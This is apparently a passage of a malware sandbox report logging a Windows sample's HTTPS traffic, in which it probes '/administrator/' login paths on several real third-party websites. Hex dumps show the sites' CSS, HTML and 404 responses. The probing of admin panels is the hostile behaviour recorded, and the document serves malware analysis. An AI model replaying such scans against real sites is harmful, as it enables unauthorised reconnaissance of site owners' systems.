                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 65 6d 70 6c 61 74 65 2d 70 61 72 74 2e 68 61
                                                                                                                                                                                                    Data Ascii: theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-part.ha
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 32 2c 31 38 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61
                                                                                                                                                                                                    Data Ascii: nt(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linea
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 36 30
                                                                                                                                                                                                    Data Ascii: ize--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d
                                                                                                                                                                                                    Data Ascii: yout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !im
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC1369INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d
                                                                                                                                                                                                    Data Ascii: !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !im


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    118192.168.2.457021120.88.73.2384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC185OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: my.calvary.qld.edu.au
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC533INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 30 6f 33 33 73 61 6f 64 6e 6f 37 76 6d 72 6f 61 36 39 35 71 39 69 37 69 65 39 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 30 32 33 20 30 36 3a 35 39 3a 33 33 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 33 36 30 30 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 45 78 70 69 72 65 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:33 GMTTransfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=0o33saodno7vmroa695q9i7ie9; expires=Sun, 26-Nov-2023 06:59:33 GMT; Max-Age=3600; path=/; secure; HttpOnlyExpires
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    119192.168.2.45754372.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC229OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://webstamp.ca/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC660INData Raw: 32 38 38 0d 0a 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 288/administrator/index.phpOOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    120192.168.2.457547194.47.252.1154436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:33 UTC179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.maxiv.lu.se
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC534INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 33 20 47 4d 54 0d 0a 73 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 38 2e 32 2e 31 32 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not Founddate: Sun, 26 Nov 2023 05:59:33 GMTserver: Apache/2.4.57 (Debian)x-powered-by: PHP/8.2.12expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0link: <https://www.maxiv.lu.se/wp-json/>; r
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC14718INData Raw: 33 39 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4d 41 58 20 49 56 3c 2f 74 69 74
                                                                                                                                                                                                    Data Ascii: 3976<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; MAX IV</tit
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC1104INData Raw: 34 34 39 0d 0a 33 33 33 22 2c 22 62 75 74 74 6f 6e 5f 34 5f 61 73 5f 62 75 74 74 6f 6e 22 3a 22 31 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 75 72 22 3a 22 23 36 31 61 32 32 39 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 62 75 74 74 6f 6e 5f 68 6f 76 65 72 22 3a 22 23 34 65 38 32 32 31 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 6c 69 6e 6b 5f 63 6f 6c 6f 75 72 22 3a 22 23 66 66 66 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 61 73 5f 62 75 74 74 6f 6e 22 3a 22 31 22 2c 22 62 75 74 74 6f 6e 5f 37 5f 6e 65 77 5f 77 69 6e 22 3a 22 22 2c 22 66 6f 6e 74 5f 66 61 6d 69 6c 79 22 3a 22 69 6e 68 65 72 69 74 22 2c 22 68 65 61 64 65 72 5f 66 69 78 22 3a 22 22 2c 22 6e 6f 74 69 66 79 5f 61 6e 69 6d 61 74 65 5f 68 69 64 65 22 3a 22 31 22 2c 22 6e 6f 74 69 66 79 5f
                                                                                                                                                                                                    Data Ascii: 449333","button_4_as_button":"1","button_7_button_colour":"#61a229","button_7_button_hover":"#4e8221","button_7_link_colour":"#fff","button_7_as_button":"1","button_7_new_win":"","font_family":"inherit","header_fix":"","notify_animate_hide":"1","notify_
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC15215INData Raw: 33 42 36 37 0d 0a 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 73 68 61 72 65 70 6f 69 6e 74 2d 70 6c 75 67 69 6e 2f 64 69 73 74 2f 6a 73 74 72 65 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 33 2e 35 22 20 69 64 3d 22 73 68 61 72 65 70 6f 69 6e 74 5f 73 63 72 69 70 74 73 5f 63 6f 72 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 73 68 61 72 65 70 6f 69 6e 74 2d 70 6c 75 67 69 6e 2f 6a 73 2f 73 68 61 72 65 70 6f 69 6e 74 5f 66
                                                                                                                                                                                                    Data Ascii: 3B67pt"></script><script src="https://www.maxiv.lu.se/wp-content/plugins/sharepoint-plugin/dist/jstree.min.js?ver=3.3.5" id="sharepoint_scripts_core-js"></script><script src="https://www.maxiv.lu.se/wp-content/plugins/sharepoint-plugin/js/sharepoint_f
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16320INData Raw: 33 46 42 38 0d 0a 31 2e 33 33 20 36 2e 30 31 20 32 34 2e 30 34 20 31 32 2e 32 32 20 34 38 2e 38 39 20 31 39 2e 36 20 36 36 2e 36 20 36 2e 37 37 20 31 36 2e 32 35 20 31 32 2e 37 36 20 32 32 2e 30 31 20 31 35 2e 38 33 20 32 32 2e 30 31 20 33 2e 30 37 20 30 20 39 2e 30 36 2d 35 2e 37 36 20 31 35 2e 38 33 2d 32 32 2e 30 31 20 37 2e 33 38 2d 31 37 2e 37 31 20 31 33 2e 35 39 2d 34 32 2e 35 36 20 31 39 2e 36 2d 36 36 2e 36 20 31 34 2e 33 31 2d 35 37 2e 32 35 20 32 37 2e 38 33 2d 31 31 31 2e 33 33 20 36 34 2e 35 34 2d 31 31 31 2e 33 33 20 33 36 2e 37 20 30 20 35 30 2e 32 32 20 35 34 2e 30 38 20 36 34 2e 35 34 20 31 31 31 2e 33 33 20 36 2e 30 31 20 32 34 2e 30 34 20 31 32 2e 32 32 20 34 38 2e 38 39 20 31 39 2e 36 20 36 36 2e 36 20 36 2e 37 37 20 31 36 2e 32 35 20
                                                                                                                                                                                                    Data Ascii: 3FB81.33 6.01 24.04 12.22 48.89 19.6 66.6 6.77 16.25 12.76 22.01 15.83 22.01 3.07 0 9.06-5.76 15.83-22.01 7.38-17.71 13.59-42.56 19.6-66.6 14.31-57.25 27.83-111.33 64.54-111.33 36.7 0 50.22 54.08 64.54 111.33 6.01 24.04 12.22 48.89 19.6 66.6 6.77 16.25
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16328INData Raw: 33 46 43 30 0d 0a 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 33 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 75 73 65 72 2d 61 63 63 65 73 73 2f 70 72 61 63 74 69 63 61 6c 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2f 75 73 65 72 2d 6f 72 67 61 6e 69 73 61 74 69 6f 6e 73 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 55 73 65 72 20 6f 72 67 61 6e 69 73 61 74 69 6f 6e 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69
                                                                                                                                                                                                    Data Ascii: 3FC0u-item-type-post_type menu-item-object-page item-depth-3'><a href="https://www.maxiv.lu.se/user-access/practical-information/user-organisations/" class="menu-item-label">User organisations</a></li><li class='menu-item menu-item-type-post_type menu-i
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16320INData Raw: 33 46 42 38 0d 0a 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c
                                                                                                                                                                                                    Data Ascii: 3FB8="material-icon submenu-toggler d-none minus-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-5'><a href="https://www.maxiv.lu.se/beaml
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16320INData Raw: 33 46 42 38 0d 0a 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73 75 62 6d 65 6e 75 2d 74 6f 67 67 6c 65 72 20 64 2d 6e 6f 6e 65 20 6d 69 6e 75 73 2d 69 63 6f 6e 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 73 2d 73 68 61 72 70 22 3e 72 65 6d 6f 76 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e
                                                                                                                                                                                                    Data Ascii: 3FB8material-icon submenu-toggler d-none minus-icon" aria-hidden="true"><span class="material-icons-sharp">remove</span></span><ul><li class='menu-item menu-item-type-post_type menu-item-object-page item-depth-5'><a href="https://www.maxiv.lu.se/beamlin
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16328INData Raw: 33 46 43 30 0d 0a 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 20 69 74 65 6d 2d 64 65 70 74 68 2d 34 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 62 65 61 6d 6c 69 6e 65 73 2f 6e 61 6e 6f 6d 61 78 2f 64 69 66 66 72 61 63 74 69 6f 6e 2d 73 74 61 74 69 6f 6e 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 44 69 66 66 72 61 63 74 69 6f 6e 20 73 74 61 74 69 6f 6e 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 61 74 65 72 69 61 6c 2d 69 63 6f 6e 20 73
                                                                                                                                                                                                    Data Ascii: 3FC0tem-type-post_type menu-item-object-page menu-item-has-children item-depth-4'><a href="https://www.maxiv.lu.se/beamlines-accelerators/beamlines/nanomax/diffraction-station/" class="menu-item-label">Diffraction station</a><span class="material-icon s
                                                                                                                                                                                                    2023-11-26 05:59:34 UTC16328INData Raw: 33 46 43 30 0d 0a 2d 62 6f 72 64 65 72 20 69 74 65 6d 2d 64 65 70 74 68 2d 35 27 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 61 78 69 76 2e 6c 75 2e 73 65 2f 62 65 61 6d 6c 69 6e 65 73 2d 61 63 63 65 6c 65 72 61 74 6f 72 73 2f 73 75 70 70 6f 72 74 2d 6c 61 62 73 2f 6d 69 63 72 6f 73 63 6f 70 79 2d 6c 61 62 73 2f 73 63 61 6e 6e 69 6e 67 2d 65 6c 65 63 74 72 6f 6e 2d 6d 69 63 72 6f 73 63 6f 70 65 2f 75 73 65 72 2d 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 73 65 6d 2f 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 6c 61 62 65 6c 22 3e 55 73 65 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 27 6d 65 6e 75 2d 69 74 65 6d 20 6d
